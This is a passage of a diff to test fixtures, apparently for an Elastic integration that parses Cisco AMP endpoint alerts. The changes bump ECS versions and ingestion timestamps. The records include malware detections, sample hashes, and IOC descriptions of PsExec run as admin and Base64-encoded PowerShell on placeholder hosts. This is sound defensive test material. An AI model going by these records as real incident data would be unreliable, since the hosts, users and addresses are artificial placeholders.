IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}", "kind": "alert", "start": "2021-01-14T10:03:40.000Z", @@ -1182,7 +1182,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1203,7 +1203,7 @@ "event": { "severity": 2, "action": "Quarantine Failure", - "ingested": "2021-09-12T17:32:35.701363103Z", + "ingested": "2021-09-13T18:06:29.783747078Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "id": "6880587034675643000", "kind": "alert" @@ -1254,7 +1254,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1275,7 +1275,7 @@ "event": { "severity": 2, "action": "Quarantine Failure", - "ingested": "2021-09-12T17:32:35.701365008Z", + "ingested": "2021-09-13T18:06:29.783749146Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "id": "6880587034675643000", "kind": "alert" @@ -1326,7 +1326,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1347,7 +1347,7 @@ "event": { "severity": 2, "action": "Quarantine Failure", - "ingested": "2021-09-12T17:32:35.701366987Z", + "ingested": "2021-09-13T18:06:29.783751302Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "id": "6880587034675643000", "kind": "alert" @@ -1398,7 +1398,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1419,7 +1419,7 @@ "event": { "severity": 2, "action": "Quarantine Failure", - "ingested": "2021-09-12T17:32:35.701368848Z", + "ingested": "2021-09-13T18:06:29.783753383Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "id": "6880587034675643000", "kind": "alert" @@ -1470,7 +1470,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1491,7 +1491,7 @@ "event": { "severity": 2, "action": "Quarantine Failure", - "ingested": "2021-09-12T17:32:35.701370740Z", + "ingested": "2021-09-13T18:06:29.783755459Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}", "id": "6880587034675643000", "kind": "alert" @@ -1553,7 +1553,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1583,7 +1583,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701372604Z", + "ingested": "2021-09-13T18:06:29.783757523Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -1646,7 +1646,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1666,7 +1666,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701374528Z", + "ingested": "2021-09-13T18:06:29.783759589Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}", "kind": "alert", "start": "2021-01-14T09:56:55.000Z", @@ -1729,7 +1729,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1755,7 +1755,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-12T17:32:35.701376409Z", + "ingested": "2021-09-13T18:06:29.783761660Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "kind": "alert", "action": "File Fetch Completed", @@ -1813,7 +1813,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1833,7 +1833,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:35.701378300Z", + "ingested": "2021-09-13T18:06:29.783763725Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136035192884000,\"timestamp\":1610603346,\"timestamp_nanoseconds\":403000000,\"date\":\"2021-01-14T05:49:06+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610603346,\"start_date\":\"2021-01-14T05:49:06+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8\"}}}}}", "kind": "alert", "start": "2021-01-14T05:49:06.000Z", @@ -1893,7 +1893,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1913,7 +1913,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701380257Z", + "ingested": "2021-09-13T18:06:29.783765876Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515350231459808800,\"timestamp\":1610584664,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-14T00:37:44+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\"}}}}", "kind": "alert", "action": "Threat Detected in Low Prevalence Executable", @@ -1968,7 +1968,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1994,7 +1994,7 @@ }, "event": { "severity": 0, - "ingested": "2021-09-12T17:32:35.701382106Z", + "ingested": "2021-09-13T18:06:29.783767954Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610584030,\"timestamp_nanoseconds\":579890366,\"date\":\"2021-01-14T00:27:10+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "kind": "alert", "action": "File Fetch Completed", @@ -2040,7 +2040,7 @@ { "@timestamp": "2021-01-14T00:02:08.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2058,7 +2058,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:35.701383971Z", + "ingested": "2021-09-13T18:06:29.783770016Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583671182384431000,\"timestamp\":1610582528,\"timestamp_nanoseconds\":614000000,\"date\":\"2021-01-14T00:02:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6583671182384431000", "kind": "alert" @@ -2100,7 +2100,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2120,7 +2120,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701385864Z", + "ingested": "2021-09-13T18:06:29.783772071Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":695000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2175,7 +2175,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2195,7 +2195,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701387740Z", + "ingested": "2021-09-13T18:06:29.783774129Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":691000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "kind": "alert", "action": "Retrospective Quarantine", @@ -2248,7 +2248,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2272,7 +2272,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701389617Z", + "ingested": "2021-09-13T18:06:29.783776187Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":684000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -2329,7 +2329,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2355,7 +2355,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:35.701391536Z", + "ingested": "2021-09-13T18:06:29.783778260Z", "original": 